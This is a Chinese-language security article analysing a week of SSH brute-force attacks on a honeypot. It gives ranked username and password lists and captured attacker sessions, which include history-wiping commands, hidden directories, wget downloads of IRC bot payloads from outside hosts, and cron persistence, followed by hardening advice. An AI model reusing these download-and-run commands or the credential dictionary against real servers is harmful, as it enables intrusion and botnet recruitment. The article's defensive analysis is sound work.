暴力破解

SSH暴力破解大约自linux系列产品诞生之后，就衍生出来的一种攻击行为，不仅仅SSH暴力破解，ftp、telnet、smtp、mysql等等都是暴力美学黑客的最爱。

日前，国外安全研究者做了个统计，他们搭建了一台蜜罐服务器，该服务上安装了修改后的SSHD版本，记录所有的登陆尝试和存储的所有会话，一旦被黑客攻击，可以查看到所有暴力破解尝试记录。

与往年不同，在十年前，一台服务器放在网络上，大概数周的时间才会被黑客光顾，现在一台服务器在网络中，在几个小时之内，就会有黑客开始进行攻击尝试了。

7天的攻击日志分析

蜜罐服务器放到网络一周之后，研究者统计了下日志，发现大约有15000次攻击，大约有50%以上的用户名是root：

#attempts #username
   9012  root (58%)
    179  test (1%)
    116  oracle (< 1%)
     87  admin
     82  info
     70  user
     69  postgres
     68  mysql
     68  backup
     55  guest
     49  web
     49  tomcat
     46  michael
     45  r00t
     43  upload
     42  alex
     41  sales
     40  linux
     39  bin
     38  ftp
     35  support
     34  temp
     33  nagios
     31  user1
     30  www
     30  test1
     30  nobody

使用的密码排行：

    365  123456 (2%)
    201  password (1%)
    114  12345 (<1%)
    105  1234
     92  root
     92  123
     84  qwerty
     76  test
     75  1q2w3e4r
     72  1qaz2wsx
     66  qazwsx
     65  123qwe
     58  12
     55  123qaz
     55  0000
     52  oracle
     50  1234567
     47  123456qwerty
     45  password123
     44  12345678
     41  1q2w3e
     40  abc123
     38  okmnji
     34  test123
     32  123456789
     31  postgres
     30  q1w2e3r4
     28  redhat
     27  user
     26  mysql
     24  apache

完整的密码列表在这里，（小编：字典又增加了）

攻击者获得密码（oracle用户）之后并没有立刻登录服务器，而是在几天后登陆服务器，并且修改了服务器的密码，防止后来者继续暴力破解，如下：

Last login: Wed Jul 10 23:05:35 2013 from otherserver.de
oracle@HONEYPOT:~]$
oracle@HONEYPOT ~]$ passwd
Changing password for user oracle.
Changing password for oracle.
(current) UNIX password: 
New password: 
Retype new password: 
passwd: all authentication tokens updated successfully.
oracle@HONEYPOT:~]$ logout

攻击者并没有发现这台服务器是台蜜罐，更改了oracle用户密码之后，攻击者尝试进行提权操作：

[oracle@HONEYPOT ~]$ w
 23:46:08 up 4 days,  4:58,  1 user,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
oracle   pts/1    111.90.151.149   23:45    0.00s  0.02s  0.00s w


[oracle@HONEYPOT ~]$ ls -all
total 20
drwx------ 2 oracle oracle 4096 Jul  8 14:50 
-rw-r--r-- 1 oracle oracle   18 Dec  2  2011 .bash_logout
-rw-r--r-- 1 oracle oracle  176 Dec  2  2011 .bash_profile
-rw-r--r-- 1 oracle oracle  124 Dec  2  2011 .bashrc
[oracle@HONEYPOT ~]$ su 
sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
[sudo] password for oracle: 
oracle is not in the sudoers file.  This incident will be reported.
oracle@HONEYPOT:~
[oracle@HONEYPOT ~]$ su
Password: 
su: incorrect password
[oracle@HONEYPOT ~]$ cd /tmp
[oracle@HONEYPOT tmp]$ mkdir ' '
[oracle@HONEYPOT:/tmp
[oracle@HONEYPOT tmp]$ cd ' '
[oracle@HONEYPOT:/tmp/ 
[oracle@HONEYPOT  ]$ wget ftp://dmitri:123123@200.63.46.99/mech.tgz
--2013-07-09 23:48:01--  ftp://dmitri:*password*@200.63.46.99/mech.tgz
..
Logging in as dmitri ... 
Connecting to 200.63.46.99:21... connected.
Logging in as dmitri ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD not needed.
==> SIZE mech.tgz ... 374664
==> PASV ... done.    ==> RETR mech.tgz ... done.
    [<=>                                    ] 0           --.-K/s              


[oracle@HONEYPOT  ]$ tar xzvf mech.tgz 
webmail/
..
webmail/run
[oracle@HONEYPOT  ]$ cd webmail/
[oracle@HONEYPOT webmail]$ ./start sunacai
######Multi Emech on Undernet######
#####      bil TheDemon       #####
%%%%%%%% 
 Undernet !!!    %%%%%%
Am gasit 1 ip-uri
SERVER Montreal.QC.CA.Undernet.org 7000


[oracle@HONEYPOT webmail]$ w
 23:49:27 up 4 days,  5:02,  1 user,  load average: 0.07, 0.03, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
oracle   pts/1    111.90.151.149   23:45    7.00s  0.05s  0.00s w
[oracle@HONEYPOT webmail]$ logout

从上可以看到，攻击者试图提权到su，然后安装一个IRC bot，另外一个用户guest也被攻击者破解，如下：

Last login: Fri Jul 12 20:21:45 2013 from 223.4.147.8
[?1034h[guest@HONEYPOT ~]$ unset HISTFILE
[guest@HONEYPOT ~]$ unset HISTSAVE
[guest@HONEYPOT ~]$ w
 15:45:40 up 7 days, 20:58,  1 user,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
guest    pts/1    82.137.10.219    15:45    4.00s  0.02s  0.00s w
[guest@HONEYPOT ~]$ passwd
Changing password for user guest.
Changing password for guest.
(current) UNIX password: 
New password: 
Retype new password: 
passwd: all authentication tokens updated successfully.
[guest@HONEYPOT ~]$ uname -a
Linux HONEYPOT REMOVED..
[guest@HONEYPOT ~]$ sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
[sudo] password for guest: 
guest is not in the sudoers file.  This incident will be reported.

[guest@HONEYPOT ~]$ mkdir " "
[guest@HONEYPOT ~]$ cd " "
[guest@HONEYPOT  ]$ wget eduteam.orgfree.com/mech.gz;tar zxvf mech.gz;rm -rf me
ch.gz;cd .bot


* * * * * /home/guest/ /.bot/update >/dev/null 2>&1
./run: ./crond: /lib/ld-linux.so.2: bad ELF interpreter: No such file or directory
[guest@HONEYPOT .bot]$ cd .
[guest@HONEYPOT .bot]$ cd ..
[guest@HONEYPOT  ]$ rm -rf bot
[guest@HONEYPOT  ]$ rm -rf .bot
[guest@HONEYPOT  ]$ wget eduteam.orgfree.com/64mcc.tgz;tar zxvf 64mcc.tgz;rm -r
f 64mcc.tgz;cd 64mcc
--2013-07-14 09:48:11--  http://eduteam.orgfree.com/64mcc.tgz
Resolving eduteam.orgfree.com... 78.47.28.69
Connecting to eduteam.orgfree.com|78.47.28.69|:80... connected.
HTTP request sent, awaiting response... 200 OK
..

[guest@HONEYPOT 64mcc]$ ./start horo
=====>Tase<=====
++++++ *Asta e o arhiva privata*  ++++++++
Am gasit 1 ip-uri
Gata
* * * * * /home/guest/ /64mcc/update >/dev/null 2>&1
EnergyMech 2.8.5, December 30th, 2002
Compiled on Dec 30 2002 10:21:24
Features: LNK, TEL, PIP, DYN, NEW, ALS, WIN, SEF
init: Mech(s) added [ maurice ]
init: EnergyMech running...

bash_history显示了他们的历史操作记录，攻击者尝试通过sudo/su来取消记录日志信息，当失败之后，攻击者下载一个IRC bot，并试图通过漏洞获得root权限，失败之后退出服务器。

结论：

SSH暴力破解现在仍然非常流行，如何保护服务器不受暴力破解攻击，我们总结了下，大致有以下几个方法：

1、使用SSH密钥，禁用口令认证，如果不能做到这一点，务必使用强壮的密码。
2、登陆IP白名单。
3、更改服务器ssh端口。
4、使用snort、ossec等开源的入侵检测设备保护服务器。